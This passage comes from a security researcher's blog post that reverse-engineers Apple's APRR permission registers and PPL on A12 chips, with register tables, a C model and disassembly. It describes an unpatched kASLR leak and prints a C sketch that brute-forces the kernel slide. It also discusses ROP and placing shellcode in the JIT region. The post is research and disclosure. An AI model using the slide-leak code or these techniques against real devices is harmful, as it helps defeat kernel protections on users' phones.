| 0xe | r--/r-x | 0x4 | 0x4 | | 0x5 |
| 0xf | r--/r-- | 0x4 | 0x4 | | 0x4 |
Let’s first look at the reg 1 values. I’ve marked the two digits that change on entry/exit, and sure enough they affect precisely the protections that PPL pages are mapped with.
Now let’s see: from 0x6 and 0x5, both to 0x4 - does that sound familiar? Maybe from a UNIX environment? Maybe from a tool called chmod?
The big enlightenment
They are permissions in rwx form! 0x4 = r, 0x2 = w, 0x1 = x.
The four page table bits that normally determine the access protections have lost all meaning on newer Apple chips. They are now solely used to construct that 4-bit number, which is then used to index the APRR registers, which hold the actual permissions.
Register 0 is used for EL0 permissions, register 1 for EL1. If registers 6 and 7 are still unclear, we can simply repeat the above process with them:
| Index | Krn/Usr | Reg 0 | Reg 6 if JIT enabled | Reg 7 if JIT rw- | Reg 7 if JIT r-x | Changed? |
|---|---|---|---|---|---|---|
| 0x0 | rwx/--x | 0x1 | 0x0 | 0x6 | 0x6 | |
| 0x1 | rwx/--- | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0x2 | rw-/--x | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0x3 | rw-/--- | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0x4 | rwx/rwx | 0x7 | 0x0 | 0x0 | 0x0 | |
| 0x5 | rwx/rw- | 0x6 | 0x0 | 0x1 | 0x1 | |
| 0x6 | rw-/rwx | 0x7 | 0x1 | 0x1 | 0x2 | <– |
| 0x7 | rw-/rw- | 0x6 | 0x0 | 0x1 | 0x1 | |
| 0x8 | r-x/--x | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0x9 | r-x/--- | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0xa | r--/--x | 0x1 | 0x0 | 0x6 | 0x6 | |
| 0xb | r--/--- | 0x0 | 0x0 | 0x7 | 0x7 | |
| 0xc | r-x/r-x | 0x5 | 0x0 | 0x2 | 0x2 | |
| 0xd | r-x/r-- | 0x4 | 0x0 | 0x3 | 0x3 | |
| 0xe | r--/r-x | 0x5 | 0x0 | 0x2 | 0x2 | |
| 0xf | r--/r-- | 0x4 | 0x0 | 0x3 | 0x3 | |
The only digit that changed in reg 7 is the one corresponding to rw-/rwx - which would seem to be the permissions the JIT region is mapped with. And obviously that is also the only index at which reg 6 has a 1. To not beat around the bush any longer: register 6 tells us whether or not to consult register 7, and if we do, we use register 7 to mask out certain bits, i.e. if the digit in question is 0x1, that will strip the executable bit.
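To recap in code form, here’s my hedged C model of the whole lookup. Since register 7 is EL0-accessible, I’m assuming its mask applies to the EL0 permissions only - I haven’t tested whether EL1 is affected as well:

```c
#include <stdint.h>

typedef struct { unsigned el1, el0; } rwx_t; // r = 4, w = 2, x = 1, chmod-style

// My reconstruction of the APRR permission model - not confirmed by any docs.
static rwx_t aprr_resolve(uint64_t tte, uint64_t reg0, uint64_t reg1,
                          uint64_t reg6, uint64_t reg7)
{
    // The old TTE permission bits only serve to build the 4-bit index now.
    unsigned idx = ((tte >> 4) & 0xc) | ((tte >> 52) & 0x2) | ((tte >> 54) & 0x1);
    rwx_t p = {
        .el1 = (unsigned)(reg1 >> (idx * 4)) & 0x7, // register 1: EL1 perms
        .el0 = (unsigned)(reg0 >> (idx * 4)) & 0x7, // register 0: EL0 perms
    };
    // If register 6 has the bit at this index set, the corresponding field of
    // register 7 holds bits to strip (e.g. 0x1 strips the executable bit).
    if ((reg6 >> idx) & 0x1)
        p.el0 &= ~((unsigned)(reg7 >> (idx * 4)) & 0x7);
    return p;
}
```

Plugging in index 0x6 (rw-/rwx) with the values from the tables reproduces the JIT behaviour: register 0 yields rwx for EL0, and register 7 then strips either x (0x1) or w (0x2).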
With that all figured out, we can complete our register table from above with sensible names:
| Register | Name |
|---|---|
| s3_4_c15_c2_0 | APRR0_EL1 |
| s3_4_c15_c2_1 | APRR1_EL1 |
| s3_4_c15_c2_2 | KTRR_LOCK_EL1 |
| s3_4_c15_c2_3 | KTRR_LOWER_EL1 |
| s3_4_c15_c2_4 | KTRR_UPPER_EL1 |
| s3_4_c15_c2_5 | KTRR_UNKNOWN_EL1 |
| s3_4_c15_c2_6 | APRR_MASK_EN_EL1 |
| s3_4_c15_c2_7 | APRR_MASK_EL0 |
If this was a bit too much bit shifting and twiddling for you, I have some slides from my TyphoonCon talk on how you get from the page table bits to the actual rwx permissions (available in full here, pages 103-119).
Here’s how it would work in a standard ARMv8.* implementation:
And here’s how it works on chips with APRR (the orange boxes are register numbers):
Two notes on these:
- This still isn’t the whole picture - there will be more detail further down this post, but that’s not gonna fit into a nice graph anymore.
- If you’re confused by the bits coming in from the top right, those are the “Hierarchical Permission Disable” (HPD) bits. Basically, a page table can already have bits set that say it can never map anything as writeable, for example, and then the write bit is stripped out of any entry mapped under it.
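For reference, in a standard ARMv8 implementation these live in (stage 1) table descriptors as follows - this is from the ARM spec, nothing Apple-specific:

```c
// Hierarchical control bits in a translation table descriptor:
#define TD_PXNTable  (1ULL << 59) // strips privileged-execute below this table
#define TD_UXNTable  (1ULL << 60) // strips unprivileged-execute below this table
#define TD_APTable_0 (1ULL << 61) // strips EL0 access below this table
#define TD_APTable_1 (1ULL << 62) // strips write access below this table
```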
Mitigations gone rogue
Remember earlier where I mentioned some people’s speculation that Apple has repurposed the UXN bit, and said that was an interesting way to put it? Time to revisit that. Let’s look at PPL page tables again:
With knowledge of how APRR works, notice anything off? Anything about __PPLDATA_CONST?
Yep, that permission is not remapped (or remapped onto itself, if you will), which means it’s actually mapped as --x in EL0! This constitutes a vulnerability that lets you brute-force the kASLR slide by simply installing a mach exception handler and repeatedly jumping to locations within the kernel’s address range. If you get an exception of type 1, it’s unmapped/inaccessible memory, but if you get an exception of type 2, you hit __PPLDATA_CONST. (Note that you can’t leak data from that page though - you might assume you could, because the exception message contains the faulting instruction. However, that is obtained via copyin, which refuses to operate on kernel addresses.) PoC is available here and is still a 0day at the time of writing.
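If you just want the gist without reading the PoC, here’s a minimal sketch of the idea. Note that this is simplified in several ways: it uses POSIX signals instead of a mach exception handler, the 0x200000 slide granularity is inferred from the paniclog earlier in this post, and PPLDATA_CONST_OFF is a hypothetical placeholder for the segment offset you’d take from the actual kernelcache:

```c
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>

#define KERNEL_BASE       0xfffffff007004000ULL // unslid text base (A12, iOS 12)
#define SLIDE_STEP        0x200000ULL           // kASLR slide granularity
#define PPLDATA_CONST_OFF 0x0ULL                // hypothetical, take from your kernelcache

static sigjmp_buf env;
static volatile int exc;

static void handler(int sig)
{
    exc = (sig == SIGSEGV) ? 1 : 2; // ~EXC_BAD_ACCESS vs ~EXC_BAD_INSTRUCTION
    siglongjmp(env, 1);
}

int main(void)
{
    signal(SIGSEGV, handler);
    signal(SIGBUS,  handler);
    signal(SIGILL,  handler);
    for(uint64_t slide = 0; ; slide += SLIDE_STEP)
    {
        uint64_t addr = KERNEL_BASE + slide + PPLDATA_CONST_OFF;
        exc = 0;
        if(!sigsetjmp(env, 1))
            ((void (*)(void))(uintptr_t)addr)(); // jump into kernel space from EL0
        if(exc == 2) // mapped and EL0-executable: we hit __PPLDATA_CONST
        {
            printf("kernel slide: 0x%llx\n", (unsigned long long)slide);
            return 0;
        }
    }
}
```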
Now there is a lot of irony in this:
- Not only did random researchers think the UXN bit got repurposed, but apparently so did Apple engineers!
- This is a vulnerability so fundamental that it is trivial to exploit, takes virtually no time, and is reachable from even the most heavily sandboxed contexts.
- It affects nothing but the latest chip generation. A11 and earlier are safe; it only exists on A12/A12X. Or, to quote Ian Beer on the matter: “So what can you do to protect yourself? Use an older device!” [is Britishly outraged]
- There isn’t even a reason to put __PPLDATA_CONST under APRR! What are you gonna do, make it more readonly than it already is?
- This is the peak of mitigation madness. We literally have one mitigation breaking another.
- Apple’s hardware team appears to be really competent, ehh... but the software team…
And this isn’t even the end of the story, but I’ll leave the rest as an exercise to the reader.
Pentesting APRR
Aside from the info leak that presented itself so openly, let’s go back and try to see what protects APRR against a motivated attacker. In the case of JIT, things are pretty simple:
0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
After the write to the system register, the commpage address is re-constructed and the value re-loaded, and checked against the value currently in the register. This prevents us from ROP’ing into the middle of the memcpy gadget and changing the register to an arbitrary value. So APRR itself is protected, but in the face of a calling primitive, the memcpy function will still happily put some shellcode in the JIT region for you, no change to the system register needed. And once you have code in the JIT region, the entire model falls apart, as you now can freely change the system register.
As for the kernel side, things are more complex there. I’ll omit the code for brevity, but a lot more cases have to be considered. The PPL entry gadget also has ROP protection, and the exit gadget is on a page that is only executable in privileged mode, so that doesn’t need it. In addition, interrupts as well as panics have to be dealt with in a safe way.
Panics are handled by having a per-CPU struct in __PPLDATA, which contains a flag saying whether we are currently in PPL or not. That flag gets set by the PPL entry tramp and cleared by the exit routine, and panic simply calls out to the latter if the flag is set, before continuing down its path.
Interrupts take a similar, albeit more nuanced approach. For a start, __PPLTRAMP has them disabled, but restores daif to its original value before actually jumping into __PPLTEXT. Now rather than checking the per-CPU data struct, the exception vectors for EL1 simply check the APRR register itself, and if it matches the privileged value, go through the PPL exit tramp. If it doesn’t though, they still check whether it matches the unprivileged value, and if not, spin. This means that even if you somehow get control of the register, you can’t reasonably set it to any value other than the existing two anyway, since the next exception you take will kill you.
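In rough C terms, the vector logic amounts to this (constants taken from the value table earlier, names mine):

```c
#include <stdint.h>

#define APRR_EL1_DEFAULT 0x4455445464666477ULL // "unprivileged" value (A12)
#define APRR_EL1_PPL     0x4455445564666677ULL // "privileged" value (A12)

extern void ppl_exit_tramp(void);

// Sketch of the check at the top of the EL1 exception vectors.
static void el1_vector_aprr_check(void)
{
    uint64_t aprr;
    __asm__ volatile("mrs %0, s3_4_c15_c2_1" : "=r"(aprr));
    if(aprr == APRR_EL1_PPL)
        ppl_exit_tramp();  // leave PPL before handling the exception
    else if(aprr != APRR_EL1_DEFAULT)
        for(;;) {}         // unrecognised value: spin forever
}
```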
So again APRR itself is safe, but what about PPL? Can we pull the same tricks as with JIT? For the most part, PPL seems to carefully sanitise the input you give it. But then, seemingly at random (for example when it came to the trust cache), they didn’t bother with that and put all their faith in PAC instead, only to be monumentally let down. Taking a look at the iOS 13 beta kernels though, this appears fixed.
Apart from that, it might be noteworthy that, same as with JIT, any single crack will tear the entire model down. If __PPLDATA or any single page table can be remapped as non-PPL, or can be written to by other means, via peripherals or the dark arts, then that can immediately be used to extend this capability to the rest of PPL-protected memory. But eh, it’s probably fine, right? ;)
Digging deeper
What XNU does with APRR is… alright I guess, but when we get such an undocumented blackbox feature, it would be outright irresponsible to not go and drive it up to its limits, right?
Again, getting shellcode execution in EL1 is left as an exercise to the reader (be that in skill or patience), but once you do have that, there’s a good bunch of things to test:
- When were these registers actually introduced?
- What do they reset to?
- What are their maximal and minimal values? Can you just set APRR0_EL1 to 0x7777777777777777 and access kernel memory from userland?
- Is the 0x8 bit settable in any field? Does it have a function?
- How does HPD affect KTRR?
- What about PAN (SMAP) and WXN?
- Are the permissions accurately reflected by the AT instruction?
- Can you create otherwise unobtainable permissions, such as write-only?
To answer all of that, I wrote a good bunch of shellcode that will run a number of different tests and dump the results into memory. The code is available here and raw results here.
In summary:
- Registers 6 and 7 appeared on the A11, but the core APRR registers 0 and 1 are present back on the A10 already. (Apple seems to have been planning this for quite a while!)
- Unlike virtually any other register, registers 0 and 1 reset to their maximum values, which are 0x4545010167670101/0x4455445566666677 respectively.
- Every bit can be set to zero, but bits that are zero at reset can never be set to one. This also means the 0x8 bit is never settable.
- TTE and HPD bits are processed before anything else. This yields what I call the “input value”.
- The input value is then copied to a “working value”, to which APRR, PAN and WXN are applied. Each of these modifies the working value, but makes decisions based on the input value rather than the working value.
- The at instructions do accurately reflect the effective permissions.
- It is possible to create write-only memory and such.
Amidst all my test results, something stood out though: weird things happen when you turn on both PAN and WXN. Let’s diff 0xffffffffffffffff-0xffffffffffffffff-PAN-WXN.txt and 0xfff0fff0fff0fff0-0xfff0fff0fff0fff0-PAN-WXN.txt, for example:
It’s the first line that’s off here. APRR would dictate that the permissions should be none, yet EL1 can read and write. It appears that, if all of the following are true:
- PAN is enabled
- WXN is enabled
- The access is privileged
- WXN applies
- PAN does not apply
Then the APRR register is not consulted. In addition, for the at instruction it seems to be enough to have both PAN and WXN enabled to break everything:
For what it’s worth, XNU runs with PAN on and WXN off - but still! How does something like that happen?! Is there some Verilog code passage somewhere that says = when it should say &=? Did I say Apple’s hardware team was really competent? I might have to backtrack a bit on that… but yet again we’ve seen one mitigation break another.
Conclusion
APRR is a pretty cool feature, even if parts of it are kinda broken. What I really like about it (besides the fact that it is an efficient and elegant solution to switching privileges) is that it untangles EL1 and EL0 memory permissions, giving you more flexibility than a standard ARMv8 implementation. What I don’t like though is that it has clearly been designed as a lockdown feature, allowing you only to take permissions away rather than freely remap them.
It’s also evident that Apple is really fond of post-exploit mitigations, or just mitigations in general. And on one hand, getting control over the physical address space is a good bit harder now. But on the other hand, Apple’s stacking of mitigations is taking a problematic turn now that adding new mitigations actively creates vulnerabilities.
But at last, we might have gathered enough information to make an educated guess as to what the acronym “APRR” actually stands for. My best guess is “Access Protection ReRouting”.
I hear when Project Zero tries to guess the meaning behind acronyms though, all Apple engineers have to offer is a smug grin, so maybe it’s also just “APple Rick Rolling”.
For typos, feedback, content questions etc., feel free to open a ticket, ping me on Twitter/Mastodon, or email me (*@*.net where * = siguza).
Till next time, peace out. ;)